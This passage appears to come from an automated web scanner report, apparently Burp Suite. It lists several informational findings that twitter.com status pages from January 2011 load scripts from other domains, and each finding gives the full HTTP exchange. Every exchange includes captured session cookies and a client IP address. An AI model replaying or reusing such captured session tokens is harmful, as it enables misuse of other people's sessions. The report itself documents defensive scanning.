Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234495-64409-10312
ETag: "3d65003ea43235d3aa8421f1e64ab649"
Last-Modified: Fri, 28 Jan 2011 17:08:15 GMT
X-Runtime: 0.05639
Content-Type: text/html; charset=utf-8
Content-Length: 13483
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjcwNTIyMDAwOTk4NDoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--5afa66a4fe336d2ca2c73e1293b7e455605f0295; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.462. http://twitter.com/malsup/status/28172927228706816

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28172927228706816

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28172927228706816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225119-58226-51590
ETag: "164c0b016849d25829c5d763bc6e3cdf"
Last-Modified: Fri, 28 Jan 2011 14:31:59 GMT
X-Runtime: 0.04999
Content-Type: text/html; charset=utf-8
Content-Length: 13565
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoMY3NyZl9pZCIlMGRiN2M4MDc2OTg1%250ANGRhNDJlZjhkZTQ0MTFkYTdmMTQ6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--69d9a47fbb23b7bbd9a88e98c06f3fe9b4546b3c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.463. http://twitter.com/malsup/status/28172927228706816

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28172927228706816

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28172927228706816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234496-78221-20778
ETag: "3b0086e99e868e3e174b5f41705940db"
Last-Modified: Fri, 28 Jan 2011 17:08:16 GMT
X-Runtime: 0.05210
Content-Type: text/html; charset=utf-8
Content-Length: 13433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--554a1d7e8d7d8704fcf0fcfd939e11401f12e57e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.464. http://twitter.com/malsup/status/28172927228706816

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28172927228706816

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28172927228706816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224897-95647-22549
ETag: "9e559c9fc45aceb0c6ca126ade823c32"
Last-Modified: Fri, 28 Jan 2011 14:28:17 GMT
X-Runtime: 0.05413
Content-Type: text/html; charset=utf-8
Content-Length: 13565
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3MjkyNzIyODcwNjgxNjoMY3NyZl9pZCIlMThlMTViODg0ZThh%250AZWQxZDY1MTRiYmFiYmUzNzlmNTU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c8db7209ce1246cbe1047e0cb576ed58c5085c73; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.465. http://twitter.com/malsup/status/28176483855896578

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28176483855896578

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28176483855896578 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224873-94611-54894
ETag: "9b55cdcf81cadef11b9b4336e0d1dfae"
Last-Modified: Fri, 28 Jan 2011 14:27:53 GMT
X-Runtime: 0.33314
Content-Type: text/html; charset=utf-8
Content-Length: 13615
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3NjQ4Mzg1NTg5NjU3ODoMY3NyZl9pZCIlYmEwMDczN2YyZjhl%250AZGZlZDk2OGM2ZmRjZDJmZTM1N2M6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--2a2ab9129448d1d35a9123d4379ea42935434e7c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.466. http://twitter.com/malsup/status/28176483855896578

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28176483855896578

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28176483855896578 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234494-57828-18740
ETag: "583131df175ad300da35c9e13d2481ed"
Last-Modified: Fri, 28 Jan 2011 17:08:14 GMT
X-Runtime: 0.06255
Content-Type: text/html; charset=utf-8
Content-Length: 13483
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE3NjQ4Mzg1NTg5NjU3ODoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--457a29f43d6901343bf5adab0152517d04df4a48; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.467. http://twitter.com/malsup/status/28206363616215040

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28206363616215040

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28206363616215040 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224864-76272-48360
ETag: "c834532c607a57bdbcfb09d898913ad5"
Last-Modified: Fri, 28 Jan 2011 14:27:44 GMT
X-Runtime: 0.06435
Content-Type: text/html; charset=utf-8
Content-Length: 13839
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODIwNjM2MzYxNjIxNTA0MDoMY3NyZl9pZCIlMzJhZDdhZWE4YTVi%250ANmI0N2NhYjc2Y2UzNjcwYmQ5NGQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--14d983691f33e1b982c79a5b234b9091c5640cfd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.468. http://twitter.com/malsup/status/28206363616215040

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28206363616215040

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28206363616215040 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225115-79599-58279
ETag: "496bb611dae1fab2d396828ac754bb25"
Last-Modified: Fri, 28 Jan 2011 14:31:55 GMT
X-Runtime: 0.07322
Content-Type: text/html; charset=utf-8
Content-Length: 13839
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODIwNjM2MzYxNjIxNTA0MDoMY3NyZl9pZCIlNTQ3YWI4MzY1NDlk%250AM2QxYjU5ZWI0ZjA4OGZhYmUzMzg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--cea7407dd03e35bff455925686b2483d6d75c582; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

